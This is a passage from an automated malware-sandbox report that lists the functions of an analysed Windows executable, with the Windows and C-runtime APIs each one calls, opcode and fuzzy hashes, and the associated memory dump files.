Opcode ID: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
Instruction ID: 38e81a813ad4ba66e94f556e1e20643fdb24780a481beb5a442678d7619a3147
Opcode Fuzzy Hash: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
Instruction Fuzzy Hash: 7B11C461609A8181DA60AB2DE884479A761EB85BF4F950331EE7D477F9CF3CD0548710

Function 00007FF7ABC3E314 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00007FF7ABC3E323
GetLastError.KERNEL32 ref: 00007FF7ABC3E339

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
Instruction ID: f9b1e98003d9b20eefa329db79680293c13a2b6b2bc6055aa49e427c488c1ea1
Opcode Fuzzy Hash: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
Instruction Fuzzy Hash: 9201D621B0C68282EB44A72EB040B2AF7909BC43A4F944034E999427B8DFBCD4848F21

Function 00007FF7ABC49078 Relevance: 3.0, APIs: 2, Instructions: 31threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7ABC49086
ExitThread.KERNEL32 ref: 00007FF7ABC4908E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
Instruction ID: bb178b5ba088e8530775df82adecb26082523446e734fe52d69f16ef9649ff4c
Opcode Fuzzy Hash: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
Instruction Fuzzy Hash: 88F0B421E0B74287EF14BBB9885997DA261EF59B10F864134D90D833F6DF2CE584C320

Function 00007FF7ABC42A38 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
Instruction ID: f44433884046dcdcc31a9b2aa005c7f7975263718791b9d6500f8eba5f928ead
Opcode Fuzzy Hash: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
Instruction Fuzzy Hash: F7E0EC45F2B10741FE78316D144AD79C1450F65770EDA1B30DDBE082F3BD1CA69A8130

Function 00007FF7ABC58340 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
Instruction ID: e8785d5569a0d5e987e2d3e8c9846180f7fd8edcdabe9f4a316d39321060c4a5
Opcode Fuzzy Hash: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
Instruction Fuzzy Hash: A5E08650F9B20243FF087BF954D887592509F84750FC64530D80E83272EE2CAA844730

Function 00007FF7ABC58550 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF7ABC583CD,?,?,00000000,00007FF7ABC58482), ref: 00007FF7ABC585BE
GetLastError.KERNEL32(?,?,?,00007FF7ABC583CD,?,?,00000000,00007FF7ABC58482), ref: 00007FF7ABC585C8

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
Instruction ID: 95e2f3160ac3b16b1a7c9bd4c1641c9572370f0e388c7bb2ed09e5f1e07f7aef
Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
Instruction Fuzzy Hash: 90212E10F4A64251FE90B72C94C067D95816F447E0FC64335EA1E473F2DE6CE5449320

Function 00007FF7ABC1DF30 Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1E207

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: dea46c4ca356dce60ce02a55334956757d660a50a99ae36b9b6fb0b255bfd765
Instruction ID: 6a14b49ae032006e8a8a298a09e6cb7531ee4a18615ed5f8ad5f8de4fbcb90d8
Opcode Fuzzy Hash: dea46c4ca356dce60ce02a55334956757d660a50a99ae36b9b6fb0b255bfd765
Instruction Fuzzy Hash: 68A1CD32B15A4189EB10DBA9D0807AC77B1FB88B68F945632DF5D93BA5CF38D590C310

Function 00007FF7ABC05680 Relevance: 1.7, APIs: 1, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
Instruction ID: 845740a735de6853fb3648882a78eb247128c0ca6fcca73b5db29a37896108b0
Opcode Fuzzy Hash: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
Instruction Fuzzy Hash: FB610B72A2A64183EA24AB1DD044A7DE3E1FB50B90FC64631EE9D466F5DE7CE481C720

Function 00007FF7ABC327F0 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC32A2B

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
Instruction ID: 51ae497fb7899abee7a6708423f4312b15a33adcd234f7f1e8a227820f859b91
Opcode Fuzzy Hash: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
Instruction Fuzzy Hash: F5619F73B19B8585EB00DB69E4406AEE7A1FB84B94F918122EE8D17B79DF3CD045CB10

Function 00007FF7ABC59510 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC59538

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
Instruction ID: d721e4e3a63af89b90793d4b6a8a3c80c8239a342f901261dd3e1aaf78b6e383
Opcode Fuzzy Hash: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
Instruction Fuzzy Hash: A141E53294A20587EA74AB1CE580A79F3A4EF55B90FD50330DA9E836B1CF6DE403C761

Function 00007FF7ABC32AE0 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC32C35

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 496871d44593103da32b144ae6ab5707e42dc31ee7d76ad2c01cf696424d008c
Instruction ID: 11ca4449e99bc89d65f855223a1b9be4e040e3b88e96e8e50468865aa6f135bd
Opcode Fuzzy Hash: 496871d44593103da32b144ae6ab5707e42dc31ee7d76ad2c01cf696424d008c
Instruction Fuzzy Hash: A231C322A2D78142FA10EB18E45076BE361FBC5790F955231FBDD06ABADF3CD5848B10

Function 00007FF7ABC6695C Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC668A7

Part of subcall function 00007FF7ABC4CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD69
Part of subcall function 00007FF7ABC4CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD8E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID:
API String ID: 4036615347-0
Opcode ID: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
Instruction ID: 2c4eed88caa53767f8aaa47460ebebaec11a0d730b9c310720e7cb8897439cbb
Opcode Fuzzy Hash: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
Instruction Fuzzy Hash: EB21F520B0A75242FA25BB694124EB9E290AF4CBD0F966530DE5D47BF5DE3CE8114332

Function 00007FF7ABC1CF20 Relevance: 1.6, APIs: 1, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1D012

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
Instruction ID: 03340ca190542d85cc0d3ef54aa70f13376a969df9642c12f53aa89594b48d9c
Opcode Fuzzy Hash: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
Instruction Fuzzy Hash: AB313476A06B0982EF159F69E09422C7366EB88F88B958032DE0D4B378DF38D895C350

Function 00007FF7ABC5B930 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5B9B6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
Instruction ID: e35d11d590c67928295cb6017cb2ad75918cb536c4491380dfa7c7f72de56cb7
Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
Instruction Fuzzy Hash: 4831AF21A5A65241E7517F5C8485BBCAA60AF50B90FC70335EA2D033F3DE7CA9418730

Function 00007FF7ABC10FF0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC110C0

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
Instruction ID: 32ddba55350e04d8cdd2948d6cbcc012ac6557e2a6b3587ee36b53302cd10e57
Opcode Fuzzy Hash: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
Instruction Fuzzy Hash: DC11E1A1B1568581EB04FB28D05977DA352EB41F88FC14032DA4D0B6BADF7EC8C4D390

Function 00007FF7ABC28870 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC1F4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1F5E2
Part of subcall function 00007FF7ABC1F4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC1F5E8

Part of subcall function 00007FF7ABC491B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC491DB

std::_Throw_Cpp_error.LIBCPMT ref: 00007FF7ABC28957

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
String ID:
API String ID: 88918588-0
Opcode ID: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
Instruction ID: 6f10637a6e7a8ae277bc7fa23cf5d1f72bef9592f9ec4048f02605f927250e17
Opcode Fuzzy Hash: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
Instruction Fuzzy Hash: 9C21923660AB4181E710EF16E445AAAB7A1FBC8BD0F868035EE8D57779DE3CD151C710

Function 00007FF7ABC48635 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7ABC48663

Part of subcall function 00007FF7ABC4875C: GetModuleHandleExW.KERNEL32 ref: 00007FF7ABC48781
Part of subcall function 00007FF7ABC4875C: GetProcAddress.KERNEL32 ref: 00007FF7ABC48797
Part of subcall function 00007FF7ABC4875C: FreeLibrary.KERNEL32 ref: 00007FF7ABC487BE

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
Instruction ID: 6f793286a1498fed3e0004839636033d54ae6537a5f8da632bb36f618819ab4a
Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
Instruction Fuzzy Hash: A921D132A16B0189EB64AF68C4886EC3BB5EB4431CF850635DB2D06AF5DF3CD681CB50

Function 00007FF7ABC5DA10 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5DA33

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 536598887a786ebbff074b2d862031b1db57d1f94f8ba90a96d35c921470b697
Instruction ID: af1b1bc883c26545cf6a9d020e1afe06095141750290ea0cc27ff972741bff4f
Opcode Fuzzy Hash: 536598887a786ebbff074b2d862031b1db57d1f94f8ba90a96d35c921470b697
Instruction Fuzzy Hash: 4421C53270D78286DB61AF2CE480B7AB6A0EB84B94F950334E65D476F9DF3CD5108B10

Function 00007FF7ABC5D94C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5D96F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
Instruction ID: 67efe2ddb172d6b5cbaf05f3dc27a9572e10d629157d9dadad925dd077462aa6
Opcode Fuzzy Hash: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
Instruction Fuzzy Hash: 6B219532A0978146DB61AF1CD480B7AB6A0EB84B54F954334E66D476F9DF3DD410CB10

Function 00007FF7ABC49DA8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC49DD9

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
Instruction ID: 142d6755c0f0bbf2e40c75a07710703593d6b284e3282ac2ec8da9f143d47c48
Opcode Fuzzy Hash: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
Instruction Fuzzy Hash: 9B11DA21A0E65185EE60BF19D4099B9E261FF95B80F868531EB4D47BB6CFBCDA008730

Function 00007FF7ABC28610 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC286B3

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

